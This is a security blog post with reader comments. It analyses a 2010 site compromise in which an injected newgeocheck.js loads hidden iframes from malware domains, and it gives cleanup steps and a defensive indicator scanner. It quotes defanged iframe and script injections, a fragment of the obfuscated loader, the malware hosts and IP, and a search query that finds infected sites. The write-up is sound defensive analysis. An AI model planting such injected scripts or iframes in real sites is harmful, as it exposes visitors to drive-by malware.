
NewGeoCheck.js and Malicious AddThiss .net Iframe

   19 May 10   Filed in Website exploits

Yesterday, I checked one site that had the following text on its Google Safe Browsing diagnostic page:

Malicious software is hosted on 1 domain(s), including addthiss .net/.

Unmask Parasites didn’t detect anything suspicious, but a quick manual check revealed the following script tag right after the <body> tag in every web page:

<sc ript type="text/javascript" src="newgeocheck.js"></script>

(Unmask Parasites doesn’t check .js files, so no wonder it couldn’t detect the source of the problem.)

This script loaded an invisible iframe from addthiss .net:

<i frame width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" style="" src="hxxp://addthiss .net/ in.cgi?8"></iframe>

Here goes the real investigation…

The newgeocheck.js file looked strange. Hackers usually inject their malicious code into legitimate .js files or create their own .js files. In this case, however, the file looked like the code of some legitimate JS library (which called itself GeoChecker 2.0.1), with meaningful comments and variable names, and at the same time it was 100% malicious.

// GeoChecker 2.0.1
// The current cookie code should be called first to ensure
// that it takes precedence over any other logic

var geocheck = true;
// assumes that the language is based on the Language Tags specification standard RFC2616 from W3C
// language-tag = primary-tag '-' sub-tag (e.g. en-US)
// primary-tag is an ISO-639 language abbreviation, sub-tag is an ISO-3166 country code

var secureNewgeoB;if(secureNewgeoB!='' && secureNewgeoB!='mIR'){secureNewgeoB='fKDE'};this.zAP=30722; ...

Well, I was puzzled and decided to check whether there was a real JS library that uses a file named newgeocheck.js. The search results contained only posts about similar hacks and … directory listings of improperly configured web sites.

Here’s the search that narrows the results down to hacked websites that allow directory listing (which is a security problem in itself): intitle:"Index of" newgeocheck.js (be careful, the sites can still be dangerous).

These search results helped me learn more about the attack.

Spread of the attack

The search currently returns 500+ results. At the same time, the Google Safe Browsing diagnostic page for addthiss .net reports 732 infected domains. Given that only about 40% of the sites in those search results are currently blacklisted, and that the search only returned mis-configured sites, I can safely estimate that there are at least a couple of thousand infected domains. Maybe significantly more.

Dates

Many web servers are configured to display file dates on directory listing pages. The dates shown for the newgeocheck.js file indicate that all sites were infected between the end of March and the middle of April.

Moreover, there seem to have been two waves of the attack: one around March 24-26 and the other around April 12-13. (Some search results show the March dates (cached), but when you visit the pages you see the April date.)

Existing JS files

Directory listings also show that other .js files (those that existed before the attack) are infected with a variant of the same obfuscated script. The script is injected at the very bottom of each .js file and usually ends with a comment like this: //secured_20022002 (the number may differ).

Speculation about the attack vector

This is definitely not a vulnerability in some popular web application. The affected sites are powered by various CMS’s and blog engines. Some websites are completely empty – you can see a lonely newgeocheck.js in an empty root directory.

At the same time this is not a server-wide or network-wide attack. The compromised sites are spread across many different IPs and networks.

On some sites I detected signs of other attacks that are known for using stolen FTP credentials (e.g. Gumblar).

I also noticed that several sites of the same owner may be infected. This usually happens when hackers use site credentials stolen from webmasters’ computers.

And while I don’t have any direct evidence (remember, I don’t have access to compromised sites and their logs), I’m almost sure that this attack used the FTP infection vector.

CountInfo .com

On some sites I found a modification of the “addthiss .net” attack. It doesn’t use the newgeocheck.js file and only injects a malicious script at the very bottom of existing .js files. The script loads the following invisible iframe from countinfo .com:

<ifr ame width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" style="" src="hxxp://countinfo .com/ in.cgi?3"></ifr ame>

Both addthiss .net and countinfo .com domains point to the same IP: 109 .196 .143 .33 (VLine Ltd, Moscow).

Reverse IP lookup also revealed some alternative domain names: addthiss .cn, addthiss .com and addthiss .org – these domains are also known for distributing malware.

To webmasters

If Google blacklists your site and the diagnostic page mentions addthiss .net, you should scan your site for

  • newgeocheck.js files in all directories (and remove them)
  • malicious code in your existing .js files (and remove it)
  • <s cript type="text/javascript" src="newgeocheck.js"></script> string in your web pages (and remove it)
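As an added example (my code, not the post’s or Unmask Parasites’), here is a small Python scanner that implements the three checks above plus the trailing //secured_<digits> marker described under “Existing JS files”. The indicator strings, regular expressions and the sample site it builds in a temporary directory are constructed for the demonstration; the host names are the ones named in the post and its comments.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the post: the injected script tag, the dropped file name,
# the "//secured_<digits>" comment appended to existing .js files, and the hosts
# the hidden iframes pointed at (freecheck.info is from the reader comments).
SCRIPT_TAG_RE = re.compile(
    r'<script[^>]*src\s*=\s*["\']?[^"\'>]*newgeocheck\.js', re.IGNORECASE)
SECURED_MARKER_RE = re.compile(r'//\s*secured_\d+\s*$', re.MULTILINE)
KNOWN_HOST_RE = re.compile(
    r'addthiss\.(?:net|com|org|cn)|countinfo\.com|freecheck\.info', re.IGNORECASE)

F_DROPPED = "dropped file newgeocheck.js"
F_MARKER = "trailing //secured_<digits> marker in .js file"
F_TAG = "script tag referencing newgeocheck.js"
F_HOST = "reference to a host named in the post"


def scan_file(path: Path) -> list:
    """Return the list of indicators found in one file (empty if clean)."""
    findings = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    if path.name.lower() == "newgeocheck.js":
        findings.append(F_DROPPED)
    # The injected code sits at the very bottom, so only the tail is checked.
    if path.suffix.lower() == ".js" and SECURED_MARKER_RE.search(text[-4096:]):
        findings.append(F_MARKER)
    if SCRIPT_TAG_RE.search(text):
        findings.append(F_TAG)
    if KNOWN_HOST_RE.search(text):
        findings.append(F_HOST)
    return findings


def scan_tree(root) -> dict:
    """Walk a site tree and map relative POSIX paths to their findings."""
    root = Path(root)
    results = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            found = scan_file(path)
            if found:
                results[path.relative_to(root).as_posix()] = found
    return results


def build_sample_site(root: Path) -> None:
    """Constructed sample files (not captured from a real compromised site)."""
    (root / "js").mkdir(parents=True, exist_ok=True)
    (root / "index.html").write_text(
        '<html><body>\n<script type="text/javascript" src="newgeocheck.js"></script>\n'
        '<p>home</p></body></html>\n', encoding="utf-8")
    (root / "newgeocheck.js").write_text(
        "// GeoChecker 2.0.1\nvar geocheck = true;\n"
        "var secureNewgeoB; /* constructed stand-in for the obfuscated payload */\n",
        encoding="utf-8")
    (root / "js" / "jquery.js").write_text(
        "function legit() { return 1; }\n"
        "var qPY; if (qPY != 'a') { qPY = 'b'; };//secured_20022002\n",
        encoding="utf-8")
    (root / "js" / "clean.js").write_text(
        "function ok() { return 2; }\n", encoding="utf-8")
    (root / "about.html").write_text(
        "<html><body><p>clean page</p></body></html>\n", encoding="utf-8")


def run_demo() -> dict:
    """Build the sample site in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, found in run_demo().items():
        print(rel, "->", "; ".join(found))
```

Point scan_tree at a copy of your document root (downloaded over a clean connection) and treat every hit as something to inspect, not to trust blindly: the marker number and the script tag formatting can vary, so a clean scan is not proof that the site is clean, which is why the post recommends restoring from a known-good backup.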

If you find newgeocheck.js on your server, your site has been attacked and your FTP credentials have been stolen.

Start with your own computer. Thoroughly scan it for malware. Then change all site passwords and keep them secure (don’t save them in your FTP programs).

The next step is cleaning up your site. Usually the easiest way to do it is to remove everything and then restore the site from a fresh, clean backup copy. This way you don’t have to process each file individually and won’t miss any malicious code on your server.

When the site is clean, you might need (if it is blacklisted by Google) to request a malware review via Google Webmaster Tools (Diagnostics -> Malware). You can find more information about how to deal with Google malware warnings here.

Have Your Say

If you know more about this attack, please share the details in the comments. Maybe you know of other attacks that create .js files that mimic legitimate JavaScript libraries?

Your comments are welcome.

[Offtopic] This is my 100th post on this blog!


Reader's Comments (4)

  1.

    Denis,

    As always, your research is invaluable to the Internet – nice job.

    We have seen this attack as well and in every case, we see the corresponding entries in the FTP logs showing that a stolen FTP account was used. We didn’t see a long list of login attempts with incorrect passwords, just a straight login with a valid FTP account, which leads us to believe that the password was stolen.

    We’ve also seen a second type of malscript in the newgeocheck.js file.

    It starts with:
    this.hB="";var geoCheck;this.secureF="secureF";var qPY;if(qPY!='rCheckO' && qPY!='checkSecureC'){qPY='rCheckO'};geoCheck="afabaea...

    It had the exact same comment section as the one you identified above, but the code was entirely different. However, it does still decode to the same iframe:

    Again, great research!

    •

      Thanks Thomas,

      This confirmation is really important as it lets webmasters of compromised sites focus on the security issues of their own computers and protecting their site credentials.

  2.

    I can confirm that this malware is placed on the accounts via stolen FTP credentials as well. I have come across a few of these over the past few days. A decode of one of the recent ones can be found here: http://jsunpack.jeek.org/dec/go?report=105b584bde1eb180d2aaa92d44d7e5cb9baae8cb

  3.

    One more domain used by this attack
    freecheck .info